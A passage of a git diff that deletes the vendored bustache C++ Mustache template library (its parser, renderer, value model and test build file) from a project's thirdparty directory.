-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_GENERATE_HPP_INCLUDED
-#define BUSTACHE_GENERATE_HPP_INCLUDED
-
-#include <bustache/model.hpp>
-
-namespace bustache { namespace detail
-{
-    inline value::pointer find(object const& data, std::string const& key)
-    {
-        auto it = data.find(key);
-        if (it != data.end())
-            return it->second.get_pointer();
-        return nullptr;
-    }
-
-    template<class Sink>
-    struct value_printer
-    {
-        typedef void result_type;
-        
-        Sink const& sink;
-        bool const escaping;
-
-        void operator()(std::nullptr_t) const {}
-        
-        template<class T>
-        void operator()(T data) const
-        {
-            sink(data);
-        }
-
-        void operator()(std::string const& data) const
-        {
-            auto it = data.data(), end = it + data.size();
-            if (escaping)
-                escape_html(it, end);
-            else
-                sink(it, end);
-        }
-        
-        void operator()(array const& data) const
-        {
-            auto it = data.begin(), end = data.end();
-            if (it != end)
-            {
-                visit(*this, *it);
-                while (++it != end)
-                {
-                    literal(",");
-                    visit(*this, *it);
-                }
-            }
-        }
-
-        void operator()(object const&) const
-        {
-            literal("[Object]");
-        }
-
-        void operator()(lambda0v const& data) const
-        {
-            visit(*this, data());
-        }
-
-        void operator()(lambda1v const& data) const
-        {
-            visit(*this, data({}));
-        }
-
-        template<class Sig>
-        void operator()(std::function<Sig> const&) const
-        {
-            literal("[Function]");
-        }
-
-        void escape_html(char const* it, char const* end) const
-        {
-            char const* last = it;
-            while (it != end)
-            {
-                switch (*it)
-                {
-                case '&': sink(last, it); literal("&amp;"); break;
-                case '<': sink(last, it); literal("&lt;"); break;
-                case '>': sink(last, it); literal("&gt;"); break;
-                case '\\': sink(last, it); literal("&#92;"); break;
-                case '"': sink(last, it); literal("&quot;"); break;
-                default:  ++it; continue;
-                }
-                last = ++it;
-            }
-            sink(last, it);
-        }
-
-        template<std::size_t N>
-        void literal(char const (&str)[N]) const
-        {
-            sink(str, str + (N - 1));
-        }
-    };
-
-    struct content_scope
-    {
-        content_scope const* const parent;
-        object const& data;
-
-        value::pointer lookup(std::string const& key) const
-        {
-            if (auto pv = find(data, key))
-                return pv;
-            if (parent)
-                return parent->lookup(key);
-            return nullptr;
-        }
-    };
-
-    struct content_visitor_base
-    {
-        using result_type = void;
-
-        content_scope const* scope;
-        value::pointer cursor;
-        std::vector<ast::override_map const*> chain;
-        mutable std::string key_cache;
-
-        // Defined in src/generate.cpp.
-        value::pointer resolve(std::string const& key) const;
-
-        ast::content_list const* find_override(std::string const& key) const
-        {
-            for (auto pm : chain)
-            {
-                auto it = pm->find(key);
-                if (it != pm->end())
-                    return &it->second;
-            }
-            return nullptr;
-        }
-    };
-
-    template<class ContentVisitor>
-    struct variable_visitor : value_printer<typename ContentVisitor::sink_type>
-    {
-        using base_type = value_printer<typename ContentVisitor::sink_type>;
-        
-        ContentVisitor& parent;
-
-        variable_visitor(ContentVisitor& parent, bool escaping)
-          : base_type{parent.sink, escaping}, parent(parent)
-        {}
-
-        using base_type::operator();
-
-        void operator()(lambda0f const& data) const
-        {
-            auto fmt(data());
-            for (auto const& content : fmt.contents())
-                visit(parent, content);
-        }
-    };
-
-    template<class ContentVisitor>
-    struct section_visitor
-    {
-        using result_type = bool;
-
-        ContentVisitor& parent;
-        ast::content_list const& contents;
-        bool const inverted;
-
-        bool operator()(object const& data) const
-        {
-            if (!inverted)
-            {
-                content_scope scope{parent.scope, data};
-                auto old_scope = parent.scope;
-                parent.scope = &scope;
-                for (auto const& content : contents)
-                    visit(parent, content);
-                parent.scope = old_scope;
-            }
-            return false;
-        }
-
-        bool operator()(array const& data) const
-        {
-            if (inverted)
-                return data.empty();
-
-            for (auto const& val : data)
-            {
-                parent.cursor = val.get_pointer();
-                if (auto obj = get<object>(&val))
-                {
-                    content_scope scope{parent.scope, *obj};
-                    auto old_scope = parent.scope;
-                    parent.scope = &scope;
-                    for (auto const& content : contents)
-                        visit(parent, content);
-                    parent.scope = old_scope;
-                }
-                else
-                {
-                    for (auto const& content : contents)
-                        visit(parent, content);
-                }
-            }
-            return false;
-        }
-
-        bool operator()(bool data) const
-        {
-            return data ^ inverted;
-        }
-
-        // The 2 overloads below are not necessary but to suppress
-        // the stupid MSVC warning.
-        bool operator()(int data) const
-        {
-            return !!data ^ inverted;
-        }
-
-        bool operator()(double data) const
-        {
-            return !!data ^ inverted;
-        }
-
-        bool operator()(std::string const& data) const
-        {
-            return !data.empty() ^ inverted;
-        }
-
-        bool operator()(std::nullptr_t) const
-        {
-            return inverted;
-        }
-
-        bool operator()(lambda0v const& data) const
-        {
-            return inverted ? false : visit(*this, data());
-        }
-
-        bool operator()(lambda0f const& data) const
-        {
-            if (!inverted)
-            {
-                auto fmt(data());
-                for (auto const& content : fmt.contents())
-                    visit(parent, content);
-            }
-            return false;
-        }
-
-        bool operator()(lambda1v const& data) const
-        {
-            return inverted ? false : visit(*this, data(contents));
-        }
-
-        bool operator()(lambda1f const& data) const
-        {
-            if (!inverted)
-            {
-                auto fmt(data(contents));
-                for (auto const& content : fmt.contents())
-                    visit(parent, content);
-            }
-            return false;
-        }
-    };
-
-    template<class Sink, class Context>
-    struct content_visitor : content_visitor_base
-    {
-        using sink_type = Sink;
-
-        Sink const& sink;
-        Context const& context;
-        std::string indent;
-        bool needs_indent;
-        bool const escaping;
-
-        content_visitor
-        (
-            content_scope const& scope, value::pointer cursor,
-            Sink const &sink, Context const &context, bool escaping
-        )
-          : content_visitor_base{&scope, cursor, {}, {}}
-          , sink(sink), context(context), needs_indent(), escaping(escaping)
-        {}
-
-        void operator()(ast::text const& text)
-        {
-            auto i = text.begin();
-            auto e = text.end();
-            assert(i != e && "empty text shouldn't be in ast");
-            if (indent.empty())
-            {
-                sink(i, e);
-                return;
-            }
-            --e; // Don't flush indent on last newline.
-            auto const ib = indent.data();
-            auto const ie = ib + indent.size();
-            if (needs_indent)
-                sink(ib, ie);
-            auto i0 = i;
-            while (i != e)
-            {
-                if (*i++ == '\n')
-                {
-                    sink(i0, i);
-                    sink(ib, ie);
-                    i0 = i;
-                }
-            }
-            needs_indent = *i++ == '\n';
-            sink(i0, i);
-        }
-        
-        void operator()(ast::variable const& variable)
-        {
-            if (auto pv = resolve(variable.key))
-            {
-                if (needs_indent)
-                {
-                    sink(indent.data(), indent.data() + indent.size());
-                    needs_indent = false;
-                }
-                variable_visitor<content_visitor> visitor
-                {
-                    *this, escaping && !variable.tag
-                };
-                visit(visitor, *pv);
-            }
-        }
-        
-        void operator()(ast::section const& section)
-        {
-            bool inverted = section.tag == '^';
-            auto old_cursor = cursor;
-            if (auto next = resolve(section.key))
-            {
-                cursor = next;
-                section_visitor<content_visitor> visitor
-                {
-                    *this, section.contents, inverted
-                };
-                if (!visit(visitor, *cursor))
-                {
-                    cursor = old_cursor;
-                    return;
-                }
-            }
-            else if (!inverted)
-                return;
-                
-            for (auto const& content : section.contents)
-                visit(*this, content);
-            cursor = old_cursor;
-        }
-        
-        void operator()(ast::partial const& partial)
-        {
-            auto it = context.find(partial.key);
-            if (it != context.end())
-            {
-                if (it->second.contents().empty())
-                    return;
-
-                auto old_size = indent.size();
-                auto old_chain = chain.size();
-                indent += partial.indent;
-                needs_indent |= !partial.indent.empty();
-                if (!partial.overriders.empty())
-                    chain.push_back(&partial.overriders);
-                for (auto const& content : it->second.contents())
-                    visit(*this, content);
-                chain.resize(old_chain);
-                indent.resize(old_size);
-            }
-        }
-
-        void operator()(ast::block const& block)
-        {
-            auto pc = find_override(block.key);
-            if (!pc)
-                pc = &block.contents;
-            for (auto const& content : *pc)
-                visit(*this, content);
-        }
-
-        void operator()(ast::null) const {} // never called
-    };
-}}
-
-namespace bustache
-{
-    template<class Sink>
-    inline void generate
-    (
-        Sink& sink, format const& fmt, value::view const& data,
-        option_type flag = normal
-    )
-    {
-        generate(sink, fmt, data, no_context::dummy(), flag);
-    }
-    
-    template<class Sink, class Context>
-    void generate
-    (
-        Sink& sink, format const& fmt, value::view const& data,
-        Context const& context, option_type flag = normal
-    )
-    {
-        object const empty;
-        auto obj = get<object>(&data);
-        detail::content_scope scope{nullptr, obj ? *obj : empty};
-        detail::content_visitor<Sink, Context> visitor{scope, data.get_pointer(), sink, context, flag};
-        for (auto const& content : fmt.contents())
-            visit(visitor, content);
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/generate/ostream.hpp b/thirdparty/bustache/include/bustache/generate/ostream.hpp
deleted file mode 100644
index 8f1a83e..0000000
--- a/thirdparty/bustache/include/bustache/generate/ostream.hpp
+++ /dev/null
@@ -1,60 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_GENERATE_OSTREAM_HPP_INCLUDED
-#define BUSTACHE_GENERATE_OSTREAM_HPP_INCLUDED
-
-#include <iostream>
-#include <bustache/generate.hpp>
-
-namespace bustache { namespace detail
-{
-    template<class CharT, class Traits>
-    struct ostream_sink
-    {
-        std::basic_ostream<CharT, Traits>& out;
-
-        void operator()(char const* it, char const* end) const
-        {
-            out.write(it, end - it);
-        }
-
-        template<class T>
-        void operator()(T data) const
-        {
-            out << data;
-        }
-
-        void operator()(bool data) const
-        {
-            out << (data ? "true" : "false");
-        }
-    };
-}}
-
-namespace bustache
-{
-    template<class CharT, class Traits, class Context>
-    void generate_ostream
-    (
-        std::basic_ostream<CharT, Traits>& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    )
-    {
-        detail::ostream_sink<CharT, Traits> sink{out};
-        generate(sink, fmt, data, context, flag);
-    }
-
-    // This is instantiated in src/generate.cpp.
-    extern template
-    void generate_ostream
-    (
-        std::ostream& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/generate/string.hpp b/thirdparty/bustache/include/bustache/generate/string.hpp
deleted file mode 100644
index cd1ddb4..0000000
--- a/thirdparty/bustache/include/bustache/generate/string.hpp
+++ /dev/null
@@ -1,108 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_GENERATE_STRING_HPP_INCLUDED
-#define BUSTACHE_GENERATE_STRING_HPP_INCLUDED
-
-#include <cstdio> // for snprintf
-#include <string>
-#include <bustache/generate.hpp>
-
-namespace bustache { namespace detail
-{
-    template<class String>
-    struct string_sink
-    {
-        String& out;
-
-        void operator()(char const* it, char const* end) const
-        {
-            out.insert(out.end(), it, end);
-        }
-
-        void operator()(int data) const
-        {
-            append_num("%d", data);
-        }
-
-        void operator()(double data) const
-        {
-            append_num("%g", data);
-        }
-
-        void operator()(bool data) const
-        {
-            data ? append("true") : append("false");
-        }
-
-        template<std::size_t N>
-        void append(char const (&str)[N]) const
-        {
-            out.insert(out.end(), str, str + (N - 1));
-        }
-
-        template<class T>
-        void append_num(char const* fmt, T data) const
-        {
-            char buf[64];
-            char* p;
-            auto old_size = out.size();
-            auto capacity = out.capacity();
-            auto bufsize = capacity - old_size;
-            if (bufsize)
-            {
-                out.resize(capacity);
-                p = &out.front() + old_size;
-            }
-            else
-            {
-                bufsize = sizeof(buf);
-                p = buf;
-            }
-            auto n = std::snprintf(p, bufsize, fmt, data);
-            if (n < 0) // error
-                return;
-            if (unsigned(n + 1) <= bufsize)
-            {
-                if (p == buf)
-                {
-                    out.insert(out.end(), p, p + n);
-                    return;
-                }
-            }
-            else
-            {
-                out.resize(old_size + n + 1); // '\0' will be written
-                std::snprintf(&out.front() + old_size, n + 1, fmt, data);
-            }
-            out.resize(old_size + n);
-        }
-    };
-}}
-
-namespace bustache
-{
-    template<class String, class Context>
-    void generate_string
-    (
-        String& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    )
-    {
-        detail::string_sink<String> sink{out};
-        generate(sink, fmt, data, context, flag);
-    }
-
-    // This is instantiated in src/generate.cpp.
-    extern template
-    void generate_string
-    (
-        std::string& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/model.hpp b/thirdparty/bustache/include/bustache/model.hpp
deleted file mode 100644
index 87b7a28..0000000
--- a/thirdparty/bustache/include/bustache/model.hpp
+++ /dev/null
@@ -1,165 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_MODEL_HPP_INCLUDED
-#define BUSTACHE_MODEL_HPP_INCLUDED
-
-#include <bustache/format.hpp>
-#include <bustache/detail/variant.hpp>
-#include <bustache/detail/any_context.hpp>
-#include <vector>
-#include <functional>
-#include <boost/unordered_map.hpp>
-
-namespace bustache
-{
-    class value;
-
-    using array = std::vector<value>;
-
-    // We use boost::unordered_map because it allows incomplete type.
-    using object = boost::unordered_map<std::string, value>;
-
-    using lambda0v = std::function<value()>;
-
-    using lambda0f = std::function<format()>;
-
-    using lambda1v = std::function<value(ast::content_list const&)>;
-
-    using lambda1f = std::function<format(ast::content_list const&)>;
-
-    namespace detail
-    {
-        struct bool_
-        {
-            bool_(bool);
-        };
-    }
-
-#define BUSTACHE_VALUE(X, D)                                                    \
-    X(0, std::nullptr_t, D)                                                     \
-    X(1, bool, D)                                                               \
-    X(2, int, D)                                                                \
-    X(3, double, D)                                                             \
-    X(4, std::string, D)                                                        \
-    X(5, array, D)                                                              \
-    X(6, lambda0v, D)                                                           \
-    X(7, lambda0f, D)                                                           \
-    X(8, lambda1v, D)                                                           \
-    X(9, lambda1f, D)                                                           \
-    X(10, object, D)                                                            \
-/***/
-
-    class value : public variant_base<value>
-    {
-        static std::nullptr_t match_type(std::nullptr_t);
-        static int match_type(int);
-        // Use a fake bool_ to prevent unintended bool conversion.
-        static bool match_type(detail::bool_);
-        static double match_type(double);
-        static std::string match_type(std::string);
-        static array match_type(array);
-        static lambda0v match_type(lambda0v);
-        static lambda0f match_type(lambda0f);
-        static lambda1v match_type(lambda1v);
-        static lambda1f match_type(lambda1f);
-        static object match_type(object);
-        // Need to override for `char const*`, otherwise `bool` will be chosen
-        static std::string match_type(char const*);
-
-    public:
-
-        struct view;
-        using pointer = variant_ptr<view>;
-
-        Zz_BUSTACHE_VARIANT_DECL(value, BUSTACHE_VALUE, false)
-
-        value() noexcept : _which(0), _0() {}
-
-        pointer get_pointer() const
-        {
-            return {_which, _storage};
-        }
-    };
-
-    struct value::view : variant_base<view>
-    {
-        using switcher = value::switcher;
-
-#define BUSTACHE_VALUE_VIEW_CTOR(N, U, D)                                       \
-        view(U const& data) noexcept : _which(N), _data(&data) {}
-        BUSTACHE_VALUE(BUSTACHE_VALUE_VIEW_CTOR,)
-#undef BUSTACHE_VALUE_VIEW_CTOR
-
-        view(value const& data) noexcept
-          : _which(data._which), _data(data._storage)
-        {}
-
-        view(unsigned which, void const* data) noexcept
-          : _which(which), _data(data)
-        {}
-
-        unsigned which() const
-        {
-            return _which;
-        }
-
-        void const* data() const
-        {
-            return _data;
-        }
-
-        pointer get_pointer() const
-        {
-            return {_which, _data};
-        }
-
-    private:
-
-        unsigned _which;
-        void const* _data;
-    };
-#undef BUSTACHE_VALUE
-}
-
-namespace bustache
-{
-    // Forward decl only.
-    template<class CharT, class Traits, class Context>
-    void generate_ostream
-    (
-        std::basic_ostream<CharT, Traits>& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    );
-
-    // Forward decl only.
-    template<class String, class Context>
-    void generate_string
-    (
-        String& out, format const& fmt,
-        value::view const& data, Context const& context, option_type flag
-    );
-
-    template<class CharT, class Traits, class T, class Context,
-        typename std::enable_if<std::is_constructible<value::view, T>::value, bool>::type = true>
-    inline std::basic_ostream<CharT, Traits>&
-    operator<<(std::basic_ostream<CharT, Traits>& out, manipulator<T, Context> const& manip)
-    {
-        generate_ostream(out, manip.fmt, manip.data, detail::any_context(manip.context), manip.flag);
-        return out;
-    }
-
-    template<class T, class Context,
-        typename std::enable_if<std::is_constructible<value::view, T>::value, bool>::type = true>
-    inline std::string to_string(manipulator<T, Context> const& manip)
-    {
-        std::string ret;
-        generate_string(ret, manip.fmt, manip.data, detail::any_context(manip.context), manip.flag);
-        return ret;
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/src/format.cpp b/thirdparty/bustache/src/format.cpp
deleted file mode 100644
index 7b56084..0000000
--- a/thirdparty/bustache/src/format.cpp
+++ /dev/null
@@ -1,484 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#include <cctype>
-#include <utility>
-#include <cstring>
-#include <bustache/format.hpp>
-
-namespace bustache { namespace parser { namespace
-{
-    using delim = std::pair<std::string, std::string>;
-
-    template<class I>
-    inline void skip(I& i, I e)
-    {
-        while (i != e && std::isspace(*i))
-            ++i;
-    }
-
-    template<class I>
-    inline bool parse_char(I& i, I e, char c)
-    {
-        if (i != e && *i == c)
-        {
-            ++i;
-            return true;
-        }
-        return false;
-    }
-
-    template<class I>
-    inline bool parse_lit(I& i, I e, boost::string_ref const& str)
-    {
-        I i0 = i;
-        for (char c : str)
-        {
-            if (!parse_char(i, e, c))
-            {
-                i = i0;
-                return false;
-            }
-        }
-        return true;
-    }
-
-    template<class I>
-    void expect_key(I& i, I e, delim& d, std::string& attr, bool suffix)
-    {
-        skip(i, e);
-        I i0 = i;
-        while (i != e)
-        {
-            I i1 = i;
-            skip(i, e);
-            if (!suffix || parse_char(i, e, '}'))
-            {
-                skip(i, e);
-                if (parse_lit(i, e, d.second))
-                {
-                    attr.assign(i0, i1);
-                    if (i0 == i1)
-                        throw format_error(error_badkey);
-                    return;
-                }
-            }
-            if (i != e)
-                ++i;
-        }
-        throw format_error(error_badkey);
-    }
-
-    template<class I>
-    bool parse_content
-    (
-        I& i0, I& i, I e, delim& d, bool& pure,
-        boost::string_ref& text, ast::content& attr,
-        boost::string_ref const& section
-    );
-
-    template<class I>
-    void parse_contents
-    (
-        I i0, I& i, I e, delim& d, bool& pure,
-        ast::content_list& attr, boost::string_ref const& section
-    );
-
-    template<class I>
-    I process_pure(I& i, I e, bool& pure)
-    {
-        I i0 = i;
-        if (pure)
-        {
-            while (i != e)
-            {
-                if (*i == '\n')
-                {
-                    i0 = ++i;
-                    break;
-                }
-                else if (std::isspace(*i))
-                    ++i;
-                else
-                {
-                    pure = false;
-                    break;
-                }
-            }
-        }
-        return i0;
-    }
-
-    template<class I>
-    inline bool expect_block(I& i, I e, delim& d, bool& pure, ast::block& attr)
-    {
-        expect_key(i, e, d, attr.key, false);
-        I i0 = process_pure(i, e, pure);
-        bool standalone = pure;
-        parse_contents(i0, i, e, d, pure, attr.contents, attr.key);
-        return standalone;
-    }
-
-    template<class I>
-    bool expect_inheritance(I& i, I e, delim& d, bool& pure, ast::partial& attr)
-    {
-        expect_key(i, e, d, attr.key, false);
-        I i0 = process_pure(i, e, pure);
-        bool standalone = pure;
-        for (boost::string_ref text;;)
-        {
-            ast::content a;
-            auto end = parse_content(i0, i, e, d, pure, text, a, attr.key);
-            if (auto p = get<ast::block>(&a))
-                attr.overriders.emplace(std::move(p->key), std::move(p->contents));
-            if (end)
-                break;
-        }
-        return standalone;
-    }
-
-    template<class I>
-    void expect_comment(I& i, I e, delim& d)
-    {
-        while (!parse_lit(i, e, d.second))
-        {
-            if (i == e)
-                throw format_error(error_delim);
-            ++i;
-        }
-    }
-
-    template<class I>
-    void expect_set_delim(I& i, I e, delim& d)
-    {
-        skip(i, e);
-        I i0 = i;
-        while (i != e)
-        {
-            if (std::isspace(*i))
-                break;
-            ++i;
-        }
-        if (i == e)
-            throw format_error(error_baddelim);
-        d.first.assign(i0, i);
-        skip(i, e);
-        i0 = i;
-        I i1 = i;
-        for (;; ++i)
-        {
-            if (i == e)
-                throw format_error(error_set_delim);
-            if (*i == '=')
-            {
-                i1 = i;
-                break;
-            }
-            if (std::isspace(*i))
-            {
-                i1 = i;
-                skip(++i, e);
-                if (i == e || *i != '=')
-                    throw format_error(error_set_delim);
-                break;
-            }
-        }
-        if (i0 == i1)
-            throw format_error(error_baddelim);
-        std::string new_close(i0, i1);
-        skip(++i, e);
-        if (!parse_lit(i, e, d.second))
-            throw format_error(error_delim);
-        d.second = std::move(new_close);
-    }
-
-    struct tag_result
-    {
-        bool is_end_section;
-        bool check_standalone;
-        bool is_standalone;
-    };
-
-    template<class I>
-    tag_result expect_tag
-    (
-        I& i, I e, delim& d, bool& pure,
-        ast::content& attr, boost::string_ref const& section
-    )
-    {
-        skip(i, e);
-        if (i == e)
-            throw format_error(error_badkey);
-        tag_result ret{};
-        switch (*i)
-        {
-        case '#':
-        case '^':
-        {
-            ast::section a;
-            a.tag = *i;
-            ret.is_standalone = expect_block(++i, e, d, pure, a);
-            attr = std::move(a);
-            return ret;
-        }
-        case '/':
-            skip(++i, e);
-            if (section.empty() || !parse_lit(i, e, section))
-                throw format_error(error_section);
-            skip(i, e);
-            if (!parse_lit(i, e, d.second))
-                throw format_error(error_delim);
-            ret.check_standalone = pure;
-            ret.is_end_section = true;
-            break;
-        case '!':
-        {
-            expect_comment(++i, e, d);
-            ret.check_standalone = pure;
-            break;
-        }
-        case '=':
-        {
-            expect_set_delim(++i, e, d);
-            ret.check_standalone = pure;
-            break;
-        }
-        case '>':
-        {
-            ast::partial a;
-            expect_key(++i, e, d, a.key, false);
-            attr = std::move(a);
-            ret.check_standalone = pure;
-            break;
-        }
-        case '&':
-        case '{':
-        {
-            ast::variable a;
-            a.tag = *i;
-            expect_key(++i, e, d, a.key, a.tag == '{');
-            attr = std::move(a);
-            pure = false;
-            break;
-        }
-        // Extensions
-        case '<':
-        {
-            ast::partial a;
-            ret.is_standalone = expect_inheritance(++i, e, d, pure, a);
-            attr = std::move(a);
-            return ret;
-        }
-        case '$':
-        {
-            ast::block a;
-            ret.is_standalone = expect_block(++i, e, d, pure, a);
-            attr = std::move(a);
-            return ret;
-        }
-        default:
-            ast::variable a;
-            expect_key(i, e, d, a.key, false);
-            attr = std::move(a);
-            pure = false;
-            break;
-        }
-        return ret;
-    }
-
-    // return true if it ends
-    template<class I>
-    bool parse_content
-    (
-        I& i0, I& i, I e, delim& d, bool& pure,
-        boost::string_ref& text, ast::content& attr,
-        boost::string_ref const& section
-    )
-    {
-        for (I i1 = i; i != e;)
-        {
-            if (*i == '\n')
-            {
-                pure = true;
-                i1 = ++i;
-            }
-            else if (std::isspace(*i))
-                ++i;
-            else
-            {
-                I i2 = i;
-                if (parse_lit(i, e, d.first))
-                {
-                    tag_result tag(expect_tag(i, e, d, pure, attr, section));
-                    text = boost::string_ref(i0, i1 - i0);
-                    if (tag.check_standalone)
-                    {
-                        I i3 = i;
-                        while (i != e)
-                        {
-                            if (*i == '\n')
-                            {
-                                ++i;
-                                break;
-                            }
-                            else if (std::isspace(*i))
-                                ++i;
-                            else
-                            {
-                                pure = false;
-                                text = boost::string_ref(i0, i2 - i0);
-                                // For end-section, we move the current pos (i)
-                                // since i0 is local to the section and is not
-                                // propagated upwards.
-                                (tag.is_end_section ? i : i0) = i3;
-                                return tag.is_end_section;
-                            }
-                        }
-                        tag.is_standalone = true;
-                    }
-                    if (!tag.is_standalone)
-                        text = boost::string_ref(i0, i2 - i0);
-                    else if (auto partial = get<ast::partial>(&attr))
-                        partial->indent.assign(i1, i2 - i1);
-                    i0 = i;
-                    return i == e || tag.is_end_section;
-                }
-                else
-                {
-                    pure = false;
-                    ++i;
-                }
-            }
-        }
-        text = boost::string_ref(i0, i - i0);
-        return true;
-    }
-
-    template<class I>
-    void parse_contents
-    (
-        I i0, I& i, I e, delim& d, bool& pure,
-        ast::content_list& attr, boost::string_ref const& section
-    )
-    {
-        for (;;)
-        {
-            boost::string_ref text;
-            ast::content a;
-            auto end = parse_content(i0, i, e, d, pure, text, a, section);
-            if (!text.empty())
-                attr.push_back(text);
-            if (!is_null(a))
-                attr.push_back(std::move(a));
-            if (end)
-                return;
-        }
-    }
-
-    template<class I>
-    inline void parse_start(I& i, I e, ast::content_list& attr)
-    {
-        delim d("{{", "}}");
-        bool pure = true;
-        parse_contents(i, i, e, d, pure, attr, {});
-    }
-}}}
-
-namespace bustache
-{
-    static char const* get_error_string(error_type err)
-    {
-        switch (err)
-        {
-        case error_set_delim:
-            return "format_error(error_set_delim): mismatched '='";
-        case error_baddelim:
-            return "format_error(error_baddelim): invalid delimiter";
-        case error_delim:
-            return "format_error(error_delim): mismatched delimiter";
-        case error_section:
-            return "format_error(error_section): mismatched end section tag";
-        case error_badkey:
-            return "format_error(error_badkey): invalid key";
-        default:
-            return "format_error";
-        }
-    }
-
-    format_error::format_error(error_type err)
-      : runtime_error(get_error_string(err)), _err(err)
-    {}
-
-    void format::init(char const* begin, char const* end)
-    {
-        parser::parse_start(begin, end, _contents);
-    }
-
-    struct accum_size
-    {
-        using result_type = std::size_t;
-
-        std::size_t operator()(ast::text const& text) const
-        {
-            return text.size();
-        }
-
-        std::size_t operator()(ast::section const& section) const
-        {
-            std::size_t n = 0;
-            for (auto const& content : section.contents)
-                n += visit(*this, content);
-            return n;
-        }
-
-        template <typename T>
-        std::size_t operator()(T const&) const
-        {
-            return 0;
-        }
-    };
-
-    std::size_t format::text_size() const
-    {
-        accum_size accum;
-        std::size_t n = 0;
-        for (auto const& content : _contents)
-            n += visit(accum, content);
-        return n;
-    }
-
-    struct copy_text_visitor
-    {
-        using result_type = void;
-
-        char* data;
-
-        void operator()(ast::text& text)
-        {
-            auto n = text.size();
-            std::memcpy(data, text.data(), n);
-            text = {data, n};
-            data += n;
-        }
-
-        void operator()(ast::section& section)
-        {
-            for (auto& content : section.contents)
-                visit(*this, content);
-        }
-
-        template <typename T>
-        void operator()(T const&) const {}
-    };
-
-    void format::copy_text(std::size_t n)
-    {
-        _text.reset(new char[n]);
-        copy_text_visitor visitor{_text.get()};
-        for (auto& content : _contents)
-            visit(visitor, content);
-    }
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/src/generate.cpp b/thirdparty/bustache/src/generate.cpp
deleted file mode 100644
index 1e41455..0000000
--- a/thirdparty/bustache/src/generate.cpp
+++ /dev/null
@@ -1,77 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-
-#include <bustache/generate.hpp>
-#include <bustache/generate/ostream.hpp>
-#include <bustache/generate/string.hpp>
-
-namespace bustache { namespace detail
-{
-    value::pointer content_visitor_base::resolve(std::string const& key) const
-    {
-        auto ki = key.begin();
-        auto ke = key.end();
-        if (ki == ke)
-            return{};
-        value::pointer pv = nullptr;
-        if (*ki == '.')
-        {
-            if (++ki == ke)
-                return cursor;
-            auto k0 = ki;
-            while (*ki != '.' && ++ki != ke);
-            key_cache.assign(k0, ki);
-            pv = find(scope->data, key_cache);
-        }
-        else
-        {
-            auto k0 = ki;
-            while (ki != ke && *ki != '.') ++ki;
-            key_cache.assign(k0, ki);
-            pv = scope->lookup(key_cache);
-        }
-        if (ki == ke)
-            return pv;
-        if (auto obj = get<object>(pv))
-        {
-            auto k0 = ++ki;
-            while (ki != ke)
-            {
-                if (*ki == '.')
-                {
-                    key_cache.assign(k0, ki);
-                    obj = get<object>(find(*obj, key_cache));
-                    if (!obj)
-                        return nullptr;
-                    k0 = ++ki;
-                }
-                else
-                    ++ki;
-            }
-            key_cache.assign(k0, ki);
-            return find(*obj, key_cache);
-        }
-        return nullptr;
-    }
-}}
-
-namespace bustache
-{
-    template
-    void generate_ostream
-    (
-        std::ostream& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-
-    template
-    void generate_string
-    (
-        std::string& out, format const& fmt,
-        value::view const& data, detail::any_context const& context, option_type flag
-    );
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/test/CMakeLists.txt b/thirdparty/bustache/test/CMakeLists.txt
deleted file mode 100644
index 74ecaee..0000000
--- a/thirdparty/bustache/test/CMakeLists.txt
+++ /dev/null
@@ -1,22 +0,0 @@
-find_package(Catch REQUIRED)
-
-add_library(Catch INTERFACE)
-target_include_directories(Catch INTERFACE ${CATCH_INCLUDE_DIR})
-
-function(add_catch_test name)
-    set(TEST_TARGET test_${name})
-    add_executable(${TEST_TARGET}
-        ${name}.cpp
-    )
-    target_link_libraries(${TEST_TARGET}
-        ${PROJECT_NAME} Catch
-    )
-    set_target_properties(${TEST_TARGET} PROPERTIES
-        CXX_STANDARD 14
-    )
-    add_test(${TEST_TARGET} ${TEST_TARGET})
-endfunction()
-
-add_catch_test(specs)
-
-add_catch_test(variant)
